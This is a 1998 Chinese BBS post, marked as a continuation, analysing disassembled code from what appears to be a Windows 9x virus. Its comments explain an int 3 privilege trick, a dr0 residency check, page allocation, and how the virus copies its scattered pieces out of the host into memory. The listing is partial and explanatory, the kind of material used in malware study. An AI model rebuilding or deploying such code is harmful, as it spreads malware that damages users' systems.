发信人: crazydiamond()
整理人: jia(1998-10-26 01:23:53), 站内信件
|
接上回:
:00000036 int 03 ;跳到 00000063 处
.......
:00000063 je 00000097 ;判断是否第二次调用? 是则跳转
:00000065 mov ecx,dr0
:00000068 jecxz 0000007A ;驻留判断, 若dr0零则继续
:0000006A add dword ptr [esp], 00000015
:0000006E mov word ptr [ebx-04], bp
:00000072 shr ebp, 10
:00000075 mov word ptr [ebx+02], bp ;恢复原来的Int3 返回
:00000079 iret
:0000007A mov dr0,ebx
:0000007D push 0000000F
:0000007F push ecx
:00000080 push FFFFFFFF
:00000082 push ecx
:00000083 push ecx
:00000084 push ecx
:00000085 push 00000001
:00000087 push 00000002
:00000089 vxdcall _PageAllocate
:0000008F add esp, 20
:00000091 xchg eax,edi ;edi 指向分配的页地址
:00000093 lea eax,[esi-63]
:00000096 iret ;返回00000037
.......
:00000037 push esi ;eax 指向病毒代码开始处 : 00000000
:00000038 mov esi, eax
:0000003A mov ecx, dword ptr [eax-04]
:0000003D repz
:0000003E movsb
:0000003F sub eax, 00000008
:00000042 mov esi, dword ptr [eax]
:00000044 or esi, esi
:00000046 je 0000004A
:00000048 jmp 0000003A
;病毒体将自身从宿主程序里抽出,复制到分配的内存页,完成驻留
;病毒体信息是按
;partN起始,partN长度,......,part1起始,part1长度
;从病毒代码起始(即00000000)向前排列的,各占1字长
:0000004A ......
--
............
※ 来源:.广州网易 BBS bbs.nease.net.[FROM: 202.96.101.254]
|
|